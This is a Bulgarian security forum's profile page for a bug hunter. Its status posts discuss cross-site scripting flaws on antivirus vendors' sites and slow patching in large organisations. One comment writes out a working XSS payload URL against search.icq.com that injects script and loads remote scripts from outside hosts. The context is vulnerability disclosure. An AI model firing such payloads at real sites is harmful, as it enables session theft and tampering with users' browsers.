Вacко

Потребител
    • Публикации

      7142
    • Регистрация

    • Последно онлайн

    • Топ дни

      1

    Вacко е топ потребител на 2 януари

    Вacко имаше най-много харесвания

    Харесвания

    9980 Гордостта на форума

    Всичко за Вacко

    • Титла
         

    Информация

    • Пол
      Мъж
    • Интереси
      bug hunter

    Последни посетители

    84528 прегледа на профила

    Статус

    Виж всички статуси на Вacко

    1. Cross-site scripting flaw on G Data Antivirus site 'www.gdata-software.com' http://t.co/aTcdmXaW #xss @GDataSoftwareUS @GDataAntiVirus

      1. Предишни коментари  1 още
      2. Вacко

        Вacко


        owasp top 10 (2010) (:

        A3: Broken Authentication and Session Management :D

        виждам че вече са фиксирали XSS-a

      3. capnemo

        capnemo

        В по-големите организации нещат стават бавно и планирано, виждал съм инсталиране на кръпка за уязвимост, открита преди 6 месеца, кръпката достъпна преди 4 месеца :)

      4. Вacко

        Вacко

        Не се учудвам(:

        ето например xss-a в icq.com още си стои: http://search.icq.com/search/preferences.php?source='"--><script x src=//0x.lv?</style></script><script>alert(String.fromCharCode(66,101,115,116,32,114,101,103,97,114,100,115,32,102,114,111,109,32,66,117,108,103,97,114,105,97))</script><script src=http://ckers.org/s>

        Специално сайтовете на АВ компаниите реагират бързо(изключая Аваст-там бъга седя доста време)

    • Разглеждащи в момента   0 потребители

      Няма регистрирани потребители разглеждащи тази страница.